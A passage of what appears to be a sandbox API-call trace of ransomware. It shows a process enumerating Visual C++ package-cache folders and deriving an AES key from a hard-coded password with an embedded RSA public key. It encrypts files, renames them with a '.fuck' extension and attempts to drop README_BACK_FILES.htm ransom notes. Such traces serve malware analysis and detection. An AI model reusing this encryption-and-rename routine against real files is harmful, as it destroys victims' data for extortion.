(normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\readme_back_files.htm")) returned 0xffffffff [0238.110] AreFileApisANSI () returned 1 [0238.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 132 [0238.110] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.110] GetLastError () returned 0x5 [0238.110] GetLastError () returned 0x5 [0238.111] FindNextFileA (in: hFindFile=0x27ead90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.111] FindClose (in: hFindFile=0x27ead90 | out: hFindFile=0x27ead90) returned 1 [0238.111] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.111] AreFileApisANSI () returned 1 [0238.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.111] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.111] GetLastError () returned 0x5 [0238.111] GetLastError () returned 0x5 [0238.111] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.111] FindClose (in: hFindFile=0x27eacd0 | out: hFindFile=0x27eacd0) returned 1 [0238.111] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\readme_back_files.htm")) returned 0xffffffff [0238.111] AreFileApisANSI () returned 1 [0238.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.111] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.112] GetLastError () returned 0x5 [0238.112] GetLastError () returned 0x5 [0238.112] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.112] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eaf10 [0238.112] FindNextFileA (in: hFindFile=0x27eaf10, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.112] FindNextFileA (in: hFindFile=0x27eaf10, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.112] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27eae50 [0238.112] FindNextFileA (in: hFindFile=0x27eae50, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.112] FindNextFileA (in: hFindFile=0x27eae50, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.112] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27eaa10 [0238.113] FindNextFileA (in: hFindFile=0x27eaa10, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.113] FindNextFileA (in: hFindFile=0x27eaa10, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.113] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.113] GetLastError () returned 0x5 [0238.113] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0238.113] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.113] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.113] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.114] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.114] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a0b8) returned 1 [0238.116] CryptCreateHash (in: hProv=0x285a0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.116] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.116] CryptHashData (hHash=0x27ea8d0, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.116] CryptDeriveKey (in: hProv=0x285a0b8, Algid=0x6610, hBaseData=0x27ea8d0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ea9d0) returned 1 [0238.116] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.116] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.116] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285a4f8) returned 1 [0238.117] CryptImportPublicKeyInfo (in: hCryptProv=0x285a4f8, dwCertEncodingType=0x1, pInfo=0x2869ba8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869bd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869be0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eab10) returned 1 [0238.117] CryptEncrypt (in: hKey=0x27eab10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.117] CryptEncrypt (in: hKey=0x27eab10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a580*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a580*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.117] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a580, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.117] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.117] CryptEncrypt (in: hKey=0x27ea9d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.117] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.117] CloseHandle (hObject=0xffffffff) returned 1 [0238.117] CloseHandle (hObject=0xffffffff) returned 1 [0238.117] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0238.118] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.118] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg")) returned 0 [0238.118] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.fuck")) returned 0 [0238.118] CryptDestroyHash (hHash=0x27ea8d0) returned 1 [0238.118] CryptDestroyKey (hKey=0x27ea9d0) returned 1 [0238.118] CryptReleaseContext (hProv=0x285a0b8, dwFlags=0x0) returned 1 [0238.118] FindNextFileA (in: hFindFile=0x27eaa10, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.118] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.118] GetLastError () returned 0x5 [0238.118] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0238.119] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x80) returned 0 [0238.119] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.119] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.119] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.120] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285a3e8) returned 1 [0238.123] CryptCreateHash (in: hProv=0x285a3e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.123] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.123] CryptHashData (hHash=0x27eaf50, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.123] CryptDeriveKey (in: hProv=0x285a3e8, Algid=0x6610, hBaseData=0x27eaf50, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ea950) returned 1 [0238.124] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.124] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.124] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285a718) returned 1 [0238.124] CryptImportPublicKeyInfo (in: hCryptProv=0x285a718, dwCertEncodingType=0x1, pInfo=0x2869938*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869968*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869970*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eabd0) returned 1 [0238.124] CryptEncrypt (in: hKey=0x27eabd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.124] CryptEncrypt (in: hKey=0x27eabd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285a7a0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285a7a0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.125] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285a7a0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.125] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.125] CryptEncrypt (in: hKey=0x27ea950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.125] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.125] CloseHandle (hObject=0xffffffff) returned 1 [0238.125] CloseHandle (hObject=0xffffffff) returned 1 [0238.125] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), bFailIfExists=0) returned 0 [0238.125] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x0) returned 0 [0238.125] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg")) returned 0 [0238.126] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.fuck" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.fuck")) returned 0 [0238.126] CryptDestroyHash (hHash=0x27eaf50) returned 1 [0238.126] CryptDestroyKey (hKey=0x27ea950) returned 1 [0238.126] CryptReleaseContext (hProv=0x285a3e8, dwFlags=0x0) returned 1 [0238.126] FindNextFileA (in: hFindFile=0x27eaa10, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.126] FindClose (in: hFindFile=0x27eaa10 | out: hFindFile=0x27eaa10) returned 1 [0238.126] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm")) returned 0xffffffff [0238.126] AreFileApisANSI () returned 1 [0238.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286ca68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 134 [0238.126] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.127] GetLastError () returned 0x5 [0238.127] GetLastError () returned 0x5 [0238.127] FindNextFileA (in: hFindFile=0x27eae50, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.127] FindClose (in: hFindFile=0x27eae50 | out: hFindFile=0x27eae50) returned 1 [0238.127] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.127] AreFileApisANSI () returned 1 [0238.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.127] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.127] GetLastError () returned 0x5 [0238.127] GetLastError () returned 0x5 [0238.127] FindNextFileA (in: hFindFile=0x27eaf10, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.127] FindClose (in: hFindFile=0x27eaf10 | out: hFindFile=0x27eaf10) returned 1 [0238.127] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\readme_back_files.htm")) returned 0xffffffff [0238.127] AreFileApisANSI () returned 1 [0238.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.128] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.128] GetLastError () returned 0x5 [0238.128] GetLastError () returned 0x5 [0238.128] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.128] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eaa50 [0238.129] FindNextFileA (in: hFindFile=0x27eaa50, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.129] FindNextFileA (in: hFindFile=0x27eaa50, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.129] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27ea8d0 [0238.129] 